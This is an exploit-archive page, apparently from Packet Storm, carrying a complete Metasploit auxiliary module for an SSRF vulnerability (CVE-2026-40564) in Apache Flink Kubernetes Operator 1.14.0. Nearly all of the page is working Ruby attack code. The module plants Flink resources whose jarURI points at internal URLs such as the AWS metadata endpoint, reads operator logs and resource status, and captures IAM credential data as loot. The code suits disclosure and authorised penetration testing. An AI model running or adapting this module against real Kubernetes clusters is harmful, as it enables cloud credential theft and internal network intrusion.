PACKETSTORM 6.5 MEDIUM

📄 Apache Flink Kubernetes Operator 1.14.0 Server-Side Request Forgery_PACKETSTORM:223516

6.5 / 10
MEDIUM
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Description

This is a Metasploit auxiliary module to demonstrate a service-side request forgery vulnerability in Apache Flink Kubernetes Operator version 1.14.0...
Visit Original Source

Basic Information

ID PACKETSTORM:223516
Published Jun 16, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Apache Flink Kubernetes Operator 1.14.0 SSRF Exploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://flink.apache.org/ |
==================================================================================================================================

[+] Summary : This is a Metasploit auxiliary module for CVE-2026-40564, a Server-Side Request Forgery (SSRF) vulnerability in the Apache Flink Kubernetes Operator

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Flink Kubernetes Operator SSRF (CVE-2026-40564)',
'Description' => %q{
A Server-Side Request Forgery (SSRF) vulnerability exists in the Apache
Flink Kubernetes Operator versions 1.14.0 through 1.15-SNAPSHOT (as of
2026-04-09). The operator does not validate the `spec.job.jarURI` field
on FlinkSessionJob or FlinkDeployment resources. Anyone who can create
these resources can set the jarURI to any URL, including internal services,
cloud metadata endpoints, or filesystem paths.

When the operator reconciles the resource, it fetches the URL from inside
its own pod, enabling attackers to:
- Read cloud instance metadata (AWS/GCE/Azure IAM credentials)
- Access internal cluster services
- Read local files via file:// scheme
- Scan internal ports

This module provides detection and exploitation capabilities for this
SSRF vulnerability.
},
'Author' => ['indoushka'],
'References' => [
['CVE', '2026-40564'],
['URL', 'https://lists.apache.org/thread/o1b3c08boc8fc9zw9qff5wsd3oc0l6sw'],
['URL', 'https://flink.apache.org/2026/05/28/flink-kubernetes-operator-ssrf-cve-2026-40564/']
],
'DisclosureDate' => '2026-05-28',
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base Kubernetes API path', '/']),
OptString.new('NAMESPACE', [false, 'Kubernetes namespace', 'default']),
OptString.new('OPERATOR_POD', [false, 'Operator pod name (auto-detected if not set)']),
OptString.new('SSRF_URL', [true, 'Target URL for SSRF (e.g., http://169.254.169.254/latest/meta-data/)']),
OptString.new('RESOURCE_NAME', [false, 'FlinkSessionJob resource name', 'ssrf-exploit']),
OptString.new('BEARER_TOKEN', [false, 'Kubernetes API bearer token']),
OptBool.new('USE_SESSION_CLUSTER', [true, 'Use FlinkSessionJob instead of FlinkDeployment', true]),
OptInt.new('TIMEOUT', [false, 'HTTP request timeout', 30])
])
end

def k8s_api_url
"https://#{datastore['RHOST']}:#{datastore['RPORT']}"
end

def k8s_headers
headers = { 'Content-Type' => 'application/json' }

if datastore['BEARER_TOKEN'] && !datastore['BEARER_TOKEN'].empty?
headers['Authorization'] = "Bearer #{datastore['BEARER_TOKEN']}"
end

headers
end
def get_operator_pod
namespace = datastore['NAMESPACE']
url = "#{k8s_api_url}/api/v1/namespaces/#{namespace}/pods"

res = send_request_cgi(
'method' => 'GET',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && res.code == 200
begin
pods = JSON.parse(res.body)
pods['items'].each do |pod|
if pod['metadata']['name'] =~ /flink-kubernetes-operator/
operator_pod = pod['metadata']['name']
print_good("Found operator pod: #{operator_pod}")
return operator_pod
end
end
rescue JSON::ParserError
print_error("Failed to parse pods response")
end
end
nil
end
def create_flink_session_job(resource_name, namespace, jar_uri)
print_status("Creating FlinkSessionJob resource: #{resource_name}")
session_job = {
apiVersion: "flink.apache.org/v1beta1",
kind: "FlinkSessionJob",
metadata: {
name: resource_name,
namespace: namespace
},
spec: {
job: {
jarURI: jar_uri,
parallelism: 1,
upgradeMode: "stateless"
},
flinkConfiguration: {},
jobManager: {},
taskManager: {}
}
}
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinksessionjobs"

res = send_request_cgi(
'method' => 'POST',
'uri' => url,
'headers' => k8s_headers,
'data' => session_job.to_json,
'ssl' => true
)
if res && res.code == 201
print_good("FlinkSessionJob created successfully")
return true
else
print_error("Failed to create FlinkSessionJob: HTTP #{res&.code}")
return false
end
end
def create_flink_deployment(resource_name, namespace, jar_uri)
print_status("Creating FlinkDeployment resource: #{resource_name}")
deployment = {
apiVersion: "flink.apache.org/v1beta1",
kind: "FlinkDeployment",
metadata: {
name: resource_name,
namespace: namespace
},
spec: {
flinkVersion: "v1_17",
flinkConfiguration: {},
jobManager: {},
taskManager: {},
job: {
jarURI: jar_uri,
parallelism: 1,
upgradeMode: "stateless"
}
}
}

url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinkdeployments"

res = send_request_cgi(
'method' => 'POST',
'uri' => url,
'headers' => k8s_headers,
'data' => deployment.to_json,
'ssl' => true
)

if res && res.code == 201
print_good("FlinkDeployment created successfully")
return true
else
print_error("Failed to create FlinkDeployment: HTTP #{res&.code}")
return false
end
end

def get_resource_status(resource_name, namespace)
resource_type = datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjobs' : 'flinkdeployments'
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/#{resource_type}/#{resource_name}"
res = send_request_cgi(
'method' => 'GET',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && res.code == 200
begin
return JSON.parse(res.body)
rescue JSON::ParserError
return nil
end
end
nil
end
def get_operator_logs(pod_name, namespace)
url = "#{k8s_api_url}/api/v1/namespaces/#{namespace}/pods/#{pod_name}/log"
res = send_request_cgi(
'method' => 'GET',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && res.code == 200
return res.body
end

nil
end
def check_ssrf_in_logs(logs, target_url)
if logs && logs.include?('HttpArtifactFetcher.fetch') && logs.include?(target_url)
print_good("SSRF confirmed in operator logs")
return true
end
false
end
def delete_resource(resource_name, namespace)
resource_type = datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjobs' : 'flinkdeployments'
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/#{resource_type}/#{resource_name}"

res = send_request_cgi(
'method' => 'DELETE',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && [200, 202, 204].include?(res.code)
print_good("Resource deleted successfully")
return true
else
print_warning("Failed to delete resource: HTTP #{res&.code}")
return false
end
end
def extract_metadata_response(response_body)
if response_body && !response_body.empty?
print_good("SSRF response received:")
print_line(response_body[0..1000])

if response_body.include?('iam') || response_body.include?('security-credentials')
print_good("Potential IAM credentials detected!")
role_match = response_body.match(/([a-zA-Z0-9\-_]+)/)
if role_match
print_status("IAM Role detected: #{role_match[1]}")
end
end
return true
end
false
end
def cleanup(resource_name, namespace)
print_status("Cleaning up resources...")
delete_resource(resource_name, namespace)
end
def check_permissions(namespace)
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinksessionjobs"

res = send_request_cgi(
'method' => 'POST',
'uri' => url,
'headers' => k8s_headers,
'data' => {}.to_json, # Empty body to test permissions
'ssl' => true
)

if res && (res.code == 201 || res.code == 403)
if res.code == 403
print_error("Insufficient permissions to create Flink resources")
return false
else
print_good("Sufficient permissions to create Flink resources")
return true
end
end

print_warning("Could not determine permissions")
true
end

def run_host(ip)
print_status("CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF")
print_status("Target: #{peer}")
print_status("SSRF Target URL: #{datastore['SSRF_URL']}")

namespace = datastore['NAMESPACE']
resource_name = "#{datastore['RESOURCE_NAME']}-#{Rex::Text.rand_text_alpha_lower(6)}"

print_status("Checking Kubernetes API connectivity...")
version_url = "#{k8s_api_url}/version"

res = send_request_cgi(
'method' => 'GET',
'uri' => version_url,
'headers' => k8s_headers,
'ssl' => true
)

unless res && res.code == 200
print_error("Cannot connect to Kubernetes API. Check RHOST, RPORT, and credentials.")
return
end

print_good("Connected to Kubernetes API")

unless check_permissions(namespace)
print_error("Insufficient permissions to exploit SSRF")
return
end

print_status("Creating malicious Flink resource...")

if datastore['USE_SESSION_CLUSTER']
success = create_flink_session_job(resource_name, namespace, datastore['SSRF_URL'])
else
success = create_flink_deployment(resource_name, namespace, datastore['SSRF_URL'])
end

unless success
print_error("Failed to create malicious resource")
return
end

print_status("Waiting for operator reconciliation (15 seconds)...")
Rex.sleep(15)

status = get_resource_status(resource_name, namespace)

if status && status['status']
print_status("Resource status: #{status['status'].to_json[0..200]}")

if status['status'].to_s.include?('Failed to fetch') ||
status['status'].to_s.include?('Connection refused') ||
status['status'].to_s.include?('connect timed out')
print_good("SSRF attempt confirmed - operator tried to fetch the URL")
end
end

operator_pod = datastore['OPERATOR_POD']
if operator_pod.nil? || operator_pod.empty?
operator_pod = get_operator_pod
end

if operator_pod
print_status("Fetching operator logs...")
logs = get_operator_logs(operator_pod, namespace)

if logs && logs.include?(datastore['SSRF_URL'])
print_good("SSRF CONFIRMED - operator fetched the URL!")

if logs =~ /GET.*?#{Regexp.escape(datastore['SSRF_URL'])}/
print_good("HTTP GET request to #{datastore['SSRF_URL']} found in logs")
end

if logs =~ /HttpArtifactFetcher\.fetch/
print_good("HttpArtifactFetcher call confirmed")
end
end
end

if datastore['SSRF_URL'].include?('169.254.169.254') || datastore['SSRF_URL'].include?('metadata')
print_status("Attempting to read AWS metadata response...")

metadata_url = datastore['SSRF_URL']
if !metadata_url.end_with?('/')
metadata_url = metadata_url + '/'
end

if datastore['USE_SESSION_CLUSTER']
create_flink_session_job("#{resource_name}-metadata", namespace, metadata_url)
else
create_flink_deployment("#{resource_name}-metadata", namespace, metadata_url)
end

Rex.sleep(10)

metadata_status = get_resource_status("#{resource_name}-metadata", namespace)

if metadata_status && metadata_status['status']
status_text = metadata_status['status'].to_s
if status_text.include?('iam') || status_text.include?('security-credentials')
print_good("Extracted metadata:")
print_line(status_text[0..500])

store_loot(
'flink.ssrf.metadata',
'text/plain',
ip,
status_text,
'aws_metadata.txt',
'AWS metadata captured via SSRF'
)
end
end

if datastore['USE_SESSION_CLUSTER']
delete_resource("#{resource_name}-metadata", namespace)
else
delete_resource("#{resource_name}-metadata", namespace)
end
end

report_vuln(
host: ip,
port: datastore['RPORT'],
name: name,
refs: references,
info: "Apache Flink Kubernetes Operator SSRF (CVE-2026-40564) - Able to fetch #{datastore['SSRF_URL']}"
)
if datastore['Cleanup']
cleanup(resource_name, namespace)
else
print_status("Resource #{resource_name} left for manual inspection")
print_status("Clean up with: kubectl delete -n #{namespace} #{datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjob' : 'flinkdeployment'} #{resource_name}")
end

print_good("SSRF exploitation completed")
end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.